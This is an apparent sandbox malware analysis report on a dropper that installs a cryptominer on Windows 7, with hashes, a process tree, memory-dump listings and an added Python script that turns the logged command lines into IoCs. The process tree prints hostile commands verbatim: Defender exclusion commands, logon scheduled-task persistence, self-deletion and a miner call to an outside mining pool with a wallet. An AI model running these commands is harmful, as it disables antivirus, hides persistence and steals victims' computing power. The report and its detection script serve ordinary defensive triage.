Analysis

  • max time kernel
    1s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    22/12/2023, 13:51

General

  • Target

    af9721f9690603beffdb08ccb2b8196a.exe

  • Size

    12.9MB

  • MD5

    af9721f9690603beffdb08ccb2b8196a

  • SHA1

    f2531c0a5d3b3670c369c1b56c3d48ce9983cb46

  • SHA256

    05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9

  • SHA512

    8d7ce747f31e51fd218fe3faa5831a25de14f7df63b541938c8490f85d0f62800e0e2fb6190587bb20b23cbe3c70cd268f1ac133c3e79c3adf2d7da9582345c8

  • SSDEEP

    393216:5BIVza8DRgTzJDmTcdUHWM2Yk/6MgkkZqL:LSJRgPJ8cdUvkyMZL

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • VMProtect packed file 8 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops file in Windows directory 13 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe
    "C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"
    1⤵
    PID:2508
    • C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe
      "C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      PID:3024
  • C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 FILE
    1⤵
    PID:2680
  • C:\Windows\system32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    1⤵
    PID:3048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      2⤵
      PID:2128
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      2⤵
      PID:1944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      2⤵
      PID:1096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      2⤵
      PID:2368
  • C:\Windows\Windows.exe
    Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 0
    1⤵
    PID:3004
  • C:\Windows\Windows.exe
    Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0
    1⤵
    PID:2704
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 1
      2⤵
      PID:952
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 2
      2⤵
      PID:1656
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 3
      2⤵
      PID:2604
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 4
      2⤵
      PID:976
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 5
      2⤵
      PID:1940
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 6
      2⤵
      PID:1704
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 7
      2⤵
      PID:2848
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 8
      2⤵
      PID:2324
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 9
      2⤵
      PID:3060
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 10
      2⤵
      PID:1892
    • C:\Windows\Windows.exe
      Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 11
      2⤵
      PID:1248
  • C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe
    "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
    1⤵
    PID:312
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
      2⤵
      PID:1732
  • C:\Windows\SysWOW64\schtasks.exe
    schtasks /Create /XML C:\Windows\winserver.xml /tn winserver
    1⤵
    • Creates scheduled task(s)
    PID:3056
  • C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Windows\WNDR.bat" "
    1⤵
    PID:2648
  • C:\Windows\SysWOW64\net.exe
    NET FILE
    1⤵
    PID:2644
  • C:\Windows\WindowsNote.exe
    "C:\Windows\WindowsNote.exe"
    1⤵
    PID:2788
  • C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"
    1⤵
    PID:2748
  • C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Windows\Winteste.bat" "
    1⤵
    PID:2840
  • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
    C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"
    1⤵
    PID:784
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
      2⤵
      PID:2424
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
      2⤵
      PID:2512
    • C:\Windows\system32\services64.exe
      "C:\Windows\system32\services64.exe"
      2⤵
      PID:1608
  • C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
    1⤵
    • Creates scheduled task(s)
    PID:1768
  • C:\Windows\system32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    1⤵
    PID:2520
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      2⤵
      PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      2⤵
      PID:2872
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      2⤵
      PID:2672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      2⤵
      PID:1248
  • C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2508
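The process tree above shows the whole chain in its command lines: Defender exclusions for entire profile and OS roots, two scheduled tasks (one from an XML, one on logon with highest run level), a choice+Del self-deletion, a VBScript launched via WScript, and the miner's stratum pool and wallet. The script below is an added triage example, not part of the sandbox report or its tooling: it runs a small rule set over command lines copied from this tree (embedded as a constructed sample) and collects the IoCs a responder would pivot on. The regexes, the severity heuristic for "broad" exclusions and the ATT&CK technique mapping are the author's assumptions.

```python
"""Command-line triage for a sandbox process tree (added example, not the report's own code)."""
import re
from dataclasses import dataclass

# Constructed sample: command lines copied from the process tree in this report,
# plus one benign-looking line ("NET FILE") that must produce no finding.
SAMPLE_CMDLINES = [
    r'''"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit''',
    r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'",
    r"Windows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 3",
    r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit''',
    r"schtasks /Create /XML C:\Windows\winserver.xml /tn winserver",
    r'''"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"''',
    r'"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"',
    r"NET FILE",
]


@dataclass(frozen=True)
class Finding:
    technique: str  # MITRE ATT&CK technique ID (assumed mapping)
    label: str
    ioc: str        # the value captured by the rule's first group


# Rules: (pattern, ATT&CK ID, label). Group 1 of each pattern is the IoC.
RULES = [
    (re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.I),
     "T1562.001", "Defender exclusion added"),
    (re.compile(r'schtasks\s+/create\b.*?/tn\s+"?([^\s"]+)', re.I),
     "T1053.005", "Scheduled task created"),
    (re.compile(r"-o\s+(stratum\+\w+://\S+)", re.I),
     "T1496", "Miner pool endpoint"),
    (re.compile(r'choice\s+/C\s+Y\b.*?&\s*Del\s+"?([^"]+)', re.I),
     "T1070.004", "Delayed self-deletion"),
    (re.compile(r'wscript\.exe"?\s+"?([^"]+\.vbs)', re.I),
     "T1059.005", "VBScript launched via WScript"),
]

# Excluding an entire profile, Temp, or the OS root blinds Defender to everything
# the droppers and the miner write; flag those separately (assumed heuristic).
BROAD_ROOTS = ("%systemroot%", "%userprofile%", "%appdata%", "%temp%",
               "c:\\windows", "c:\\users\\admin")


def analyze(cmdline: str) -> list:
    """Return every rule hit in one command line; a cmd /c chain can yield several."""
    hits = []
    for pattern, technique, label in RULES:
        for m in pattern.finditer(cmdline):
            hits.append(Finding(technique, label, m.group(1)))
    return hits


def is_broad_exclusion(path: str) -> bool:
    """True when the excluded path is one of the roots above or sits directly under one."""
    p = path.strip().lower().rstrip("\\")
    return any(p == root or p.startswith(root + "\\") for root in BROAD_ROOTS)


def triage(cmdlines) -> dict:
    """Aggregate IoCs across a process tree and count techniques (order-preserving, deduplicated)."""
    report = {"exclusions": [], "broad_exclusions": [], "tasks": [], "task_targets": [],
              "pools": [], "wallets": [], "deleted": [], "scripts": [], "techniques": {}}
    for line in cmdlines:
        for f in analyze(line):
            report["techniques"][f.technique] = report["techniques"].get(f.technique, 0) + 1
            if f.technique == "T1562.001":
                report["exclusions"].append(f.ioc)
                if is_broad_exclusion(f.ioc):
                    report["broad_exclusions"].append(f.ioc)
            elif f.technique == "T1053.005":
                report["tasks"].append(f.ioc)
                tr = re.search(r"""/tr\s+'?"?([^'"]+)""", line, re.I)  # task action, if given inline
                if tr:
                    report["task_targets"].append(tr.group(1))
            elif f.technique == "T1496":
                report["pools"].append(f.ioc)
                wallet = re.search(r"-u\s+(\S+)", line)  # "-u wallet.worker" -> keep the wallet
                if wallet:
                    report["wallets"].append(wallet.group(1).split(".")[0])
            elif f.technique == "T1070.004":
                report["deleted"].append(f.ioc)
            elif f.technique == "T1059.005":
                report["scripts"].append(f.ioc)
    for key, value in report.items():
        if isinstance(value, list):
            report[key] = list(dict.fromkeys(value))
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINES).items():
        print(f"{key}: {value}")
```

The pool host, wallet, task names and excluded paths are the values worth feeding back into EDR or firewall searches; matching on the `-reboot-times` counter or the random dropper names would be brittle, since those change per run.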

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/312-184-0x000007FEF5750000-0x000007FEF613C000-memory.dmp
    Filesize 9.9MB
  • memory/312-66-0x000007FEF5750000-0x000007FEF613C000-memory.dmp
    Filesize 9.9MB
  • memory/312-137-0x000000001BC60000-0x000000001BCE0000-memory.dmp
    Filesize 512KB
  • memory/312-131-0x000007FEF5750000-0x000007FEF613C000-memory.dmp
    Filesize 9.9MB
  • memory/312-67-0x000000001BC60000-0x000000001BCE0000-memory.dmp
    Filesize 512KB
  • memory/312-64-0x000000013FBC0000-0x000000013FDD4000-memory.dmp
    Filesize 2.1MB
  • memory/784-194-0x000007FEF5750000-0x000007FEF613C000-memory.dmp
    Filesize 9.9MB
  • memory/784-185-0x000007FEF5750000-0x000007FEF613C000-memory.dmp
    Filesize 9.9MB
  • memory/784-183-0x000000013F6F0000-0x000000013F8F6000-memory.dmp
    Filesize 2.0MB
  • memory/784-186-0x000000001B580000-0x000000001B600000-memory.dmp
    Filesize 512KB
  • memory/952-177-0x0000000077180000-0x0000000077329000-memory.dmp
    Filesize 1.7MB
  • memory/952-171-0x0000000140000000-0x0000000141B3D000-memory.dmp
    Filesize 27.2MB
  • memory/952-176-0x0000000140000000-0x0000000141B3D000-memory.dmp
    Filesize 27.2MB
  • memory/952-172-0x0000000077180000-0x0000000077329000-memory.dmp
    Filesize 1.7MB
  • memory/1096-133-0x0000000002B20000-0x0000000002BA0000-memory.dmp
    Filesize 512KB
  • memory/1096-138-0x0000000002B20000-0x0000000002BA0000-memory.dmp
    Filesize 512KB
  • memory/1096-139-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp
    Filesize 9.6MB
  • memory/1096-135-0x0000000002B20000-0x0000000002BA0000-memory.dmp
    Filesize 512KB
  • memory/1096-136-0x0000000002B20000-0x0000000002BA0000-memory.dmp
    Filesize 512KB
  • memory/1096-134-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp
    Filesize 9.6MB
  • memory/1096-132-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp
    Filesize 9.6MB
  • memory/1608-196-0x000000001ADC0000-0x000000001AE40000-memory.dmp
    Filesize 512KB
  • memory/1608-195-0x000007FEF5750000-0x000007FEF613C000-memory.dmp
    Filesize 9.9MB
  • memory/1608-193-0x000000013F1A0000-0x000000013F3B4000-memory.dmp
    Filesize 2.1MB
  • memory/1656-256-0x0000000140000000-0x0000000141B3D000-memory.dmp
    Filesize 27.2MB
  • memory/1944-123-0x0000000002A20000-0x0000000002AA0000-memory.dmp
    Filesize 512KB
  • memory/1944-124-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp
    Filesize 9.6MB
  • memory/1944-122-0x0000000002A20000-0x0000000002AA0000-memory.dmp
    Filesize 512KB
  • memory/1944-120-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp
    Filesize 9.6MB
  • memory/1944-118-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp
    Filesize 9.6MB
  • memory/1944-119-0x0000000002A20000-0x0000000002AA0000-memory.dmp
    Filesize 512KB
  • memory/1944-121-0x0000000002A20000-0x0000000002AA0000-memory.dmp
    Filesize 512KB
  • memory/2128-73-0x0000000001E10000-0x0000000001E18000-memory.dmp
    Filesize 32KB
  • memory/2128-79-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp
    Filesize 9.6MB
  • memory/2128-80-0x0000000002D30000-0x0000000002DB0000-memory.dmp
    Filesize 512KB
  • memory/2128-78-0x0000000002D30000-0x0000000002DB0000-memory.dmp
    Filesize 512KB
  • memory/2128-77-0x0000000002D34000-0x0000000002D37000-memory.dmp
    Filesize 12KB
  • memory/2128-140-0x0000000002D30000-0x0000000002DB0000-memory.dmp
    Filesize 512KB
  • memory/2128-72-0x000000001B700000-0x000000001B9E2000-memory.dmp
    Filesize 2.9MB
  • memory/2128-75-0x0000000002D30000-0x0000000002DB0000-memory.dmp
    Filesize 512KB
  • memory/2128-74-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp
    Filesize 9.6MB
  • memory/2128-76-0x000007FEF29B0000-0x000007FEF334D000-memory.dmp
    Filesize 9.6MB
  • memory/2368-88-0x0000000002810000-0x0000000002818000-memory.dmp
    Filesize 32KB
  • memory/2368-109-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp
    Filesize 9.6MB
  • memory/2368-107-0x0000000002C00000-0x0000000002C80000-memory.dmp
    Filesize 512KB
  • memory/2368-87-0x000000001B580000-0x000000001B862000-memory.dmp
    Filesize 2.9MB
  • memory/2368-100-0x0000000002C00000-0x0000000002C80000-memory.dmp
    Filesize 512KB
  • memory/2368-92-0x000007FEF2010000-0x000007FEF29AD000-memory.dmp
    Filesize 9.6MB
  • memory/2368-94-0x0000000002C00000-0x0000000002C80000-memory.dmp
    Filesize 512KB
  • memory/2368-96-0x0000000002C00000-0x0000000002C80000-memory.dmp
    Filesize 512KB
  • memory/2508-1-0x0000000000400000-0x00000000010F6000-memory.dmp
    Filesize 13.0MB
  • memory/2508-0-0x0000000074380000-0x0000000074A6E000-memory.dmp
    Filesize 6.9MB
  • memory/2508-2-0x0000000005330000-0x0000000005370000-memory.dmp
    Filesize 256KB
  • memory/2508-10-0x0000000074380000-0x0000000074A6E000-memory.dmp
    Filesize 6.9MB
  • memory/2704-98-0x0000000077330000-0x0000000077332000-memory.dmp
    Filesize 8KB
  • memory/2704-145-0x0000000140000000-0x0000000141B3D000-memory.dmp
    Filesize 27.2MB
  • memory/2704-105-0x0000000077340000-0x0000000077342000-memory.dmp
    Filesize 8KB
  • memory/2704-159-0x0000000077180000-0x0000000077329000-memory.dmp
    Filesize

                                                                                  1.7MB

                                                                                • memory/2704-106-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/2704-89-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/2704-90-0x0000000077330000-0x0000000077332000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-93-0x0000000077330000-0x0000000077332000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-99-0x0000000077340000-0x0000000077342000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2704-102-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/2704-103-0x0000000077340000-0x0000000077342000-memory.dmp

                                                                                  Filesize

                                                                                  8KB

                                                                                • memory/2788-50-0x0000000000400000-0x000000000061A000-memory.dmp

                                                                                  Filesize

                                                                                  2.1MB

                                                                                • memory/2788-51-0x0000000073080000-0x000000007376E000-memory.dmp

                                                                                  Filesize

                                                                                  6.9MB

                                                                                • memory/2788-53-0x0000000004610000-0x0000000004650000-memory.dmp

                                                                                  Filesize

                                                                                  256KB

                                                                                • memory/2788-61-0x0000000073080000-0x000000007376E000-memory.dmp

                                                                                  Filesize

                                                                                  6.9MB

                                                                                • memory/3004-157-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/3004-158-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/3004-153-0x0000000140000000-0x0000000141B3D000-memory.dmp

                                                                                  Filesize

                                                                                  27.2MB

                                                                                • memory/3004-147-0x0000000077180000-0x0000000077329000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB